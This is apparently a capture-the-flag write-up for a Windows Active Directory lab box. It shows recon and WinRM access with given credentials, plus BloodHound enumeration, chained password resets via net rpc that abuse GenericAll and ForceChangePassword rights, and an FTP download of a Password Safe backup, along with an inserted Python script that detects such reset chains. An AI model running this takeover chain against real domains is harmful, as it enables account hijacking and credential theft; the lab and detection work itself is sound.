Machine Information
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account:
Username: Olivia
Password: ichliebedich
❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.42 -oG port
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 127
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
❯ nmap -sCV -p21,53,88,135,139,389,445,464,593,636,3268,3269 10.10.11.42 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 16:43 EDT
Nmap scan report for 10.10.11.42
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-25 19:47:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-25T19:47:23
|_ start_date: N/A
|_clock-skew: -55m49s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Open ports, with the version and service running on each.
We confirm the domain name (administrator.htb) and add it to /etc/hosts.
nxc
❯ nxc winrm 10.10.11.42 -u 'Olivia' -p 'ichliebedich' 2>/dev/null
WINRM 10.10.11.42 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM 10.10.11.42 5985 DC [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)
This command checks whether the supplied credentials authenticate successfully over WinRM, the protocol used for remote administration of Windows systems.
❯ evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.42
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
*Evil-WinRM* PS C:\Users\olivia\Documents>
We connect and we are in.
❯ nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --users 2>/dev/null
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.10.11.42 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.42 445 DC Administrator 2024-10-22 18:59:36 0 Built-in account for administering the computer/domain
SMB 10.10.11.42 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.42 445 DC krbtgt 2024-10-04 19:53:28 0 Key Distribution Center Service Account
SMB 10.10.11.42 445 DC olivia 2024-10-06 01:22:48 0
SMB 10.10.11.42 445 DC michael 2025-04-24 01:58:57 0
SMB 10.10.11.42 445 DC benjamin 2025-04-24 02:02:27 0
SMB 10.10.11.42 445 DC emily 2024-10-30 23:40:02 0
SMB 10.10.11.42 445 DC ethan 2024-10-12 20:52:14 0
SMB 10.10.11.42 445 DC alexander 2024-10-31 00:18:04 0
SMB 10.10.11.42 445 DC emma 2024-10-31 00:18:35 0
SMB 10.10.11.42 445 DC [*] Enumerated 10 local users: ADMINISTRATOR
With this command we are asking the SMB server: "With this username and password, can you tell me which users exist on the system?"
❯ bloodhound-python -u 'olivia' -p 'ichliebedich' -c All --zip -ns 10.10.11.42 -d administrator.htb
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 10S
INFO: Compressing output into 20250426004656_bloodhound.zip
This command uses bloodhound-python, which collects Active Directory (AD) information so it can later be analysed visually in BloodHound.
We are currently olivia, and we observe that olivia holds the GenericAll right over the user michael.
❯ net rpc password "michael" "newP@ssword2022" -U "administrator.htb"/"olivia"%"ichliebedich" -S "10.10.11.42"
"Hi, I'm olivia, and I have the permissions. I want to change the password of the user michael to newP@ssword2022."
🔐 Since olivia has sufficient rights over michael (here GenericAll, which includes resetting the password), the password change goes through without issue.
❯ evil-winrm -i 10.10.11.42 -u 'michael' -p 'newP@ssword2022'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael
*Evil-WinRM* PS C:\Users\michael\Documents>
We can see that we are able to connect as michael, since we have changed his password.
Now that we have valid credentials for michael, we observe that michael has ForceChangePassword over benjamin; in plain terms, we can change benjamin's password.
❯ net rpc password "benjamin" "newP@ssword2022" -U "administrator.htb"/"michael"%"newP@ssword2022" -S "10.10.11.42"
We change benjamin's password.
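As the defender's counterpart to the two resets above, here is an added example (not part of the writeup) that flags Event ID 4724 password resets performed by non-approved accounts and "reset chains" like olivia → michael → benjamin, where a freshly reset account immediately resets someone else. The simplified log format, the allowlist of approved resetters and the timestamps are constructed for the example.

```python
"""Flag suspicious Active Directory password resets (Security Event ID 4724).

Rule 1: the resetting account (Subject) is not an approved helpdesk/admin account.
Rule 2: reset chain - an account whose own password was just reset performs a
        reset of another account within CHAIN_WINDOW.
"""
from datetime import datetime, timedelta

# Accounts expected to reset other users' passwords (assumed allowlist).
APPROVED_RESETTERS = {"helpdesk-svc", "administrator"}
CHAIN_WINDOW = timedelta(hours=1)

# Constructed sample events in a simplified "key=value" export; a real pipeline
# would take Subject/Target from the 4724 event XML. 4738 is a decoy (not a reset).
SAMPLE_LOG = """\
2025-04-26T00:52:10Z EventID=4724 Subject=helpdesk-svc Target=emma
2025-04-26T00:55:41Z EventID=4724 Subject=olivia Target=michael
2025-04-26T00:58:03Z EventID=4738 Subject=olivia Target=michael
2025-04-26T01:01:27Z EventID=4724 Subject=michael Target=benjamin
"""


def parse_events(text):
    """Parse one event per line into a dict, keeping only 4724 (password reset)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        ev = dict(f.split("=", 1) for f in fields)
        if ev.get("EventID") != "4724":
            continue
        ev["time"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def find_suspicious_resets(events):
    """Return (target, reason) pairs for resets that violate either rule."""
    findings = []
    recently_reset = {}  # account -> time its password was last reset
    for ev in sorted(events, key=lambda e: e["time"]):
        subj, tgt, t = ev["Subject"].lower(), ev["Target"].lower(), ev["time"]
        if subj not in APPROVED_RESETTERS:
            findings.append((tgt, f"reset by non-approved account {subj}"))
        last = recently_reset.get(subj)
        if last is not None and t - last <= CHAIN_WINDOW:
            findings.append((tgt, f"reset chain: {subj} was itself reset at {last:%H:%M}"))
        recently_reset[tgt] = t
    return findings


if __name__ == "__main__":
    for target, reason in find_suspicious_resets(parse_events(SAMPLE_LOG)):
        print(f"[!] {target}: {reason}")
```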
FTP
❯ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:kali): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||51408|)
125 Data connection already open; Transfer starting.
10-05-24 09:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||51411|)
125 Data connection already open; Transfer starting.
100% |*****************************************************************************************************************| 952 25.95 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (25.73 KiB/s)
ftp>
Now, with benjamin's credentials, we connect over FTP and download what we find there. Note the "bare linefeeds received in ASCII mode" warning: Backup.psafe3 is a binary Password Safe database, so it should be transferred in binary mode (the ftp `binary` command before `get`) and the file size compared with the listing, or the download may be corrupted.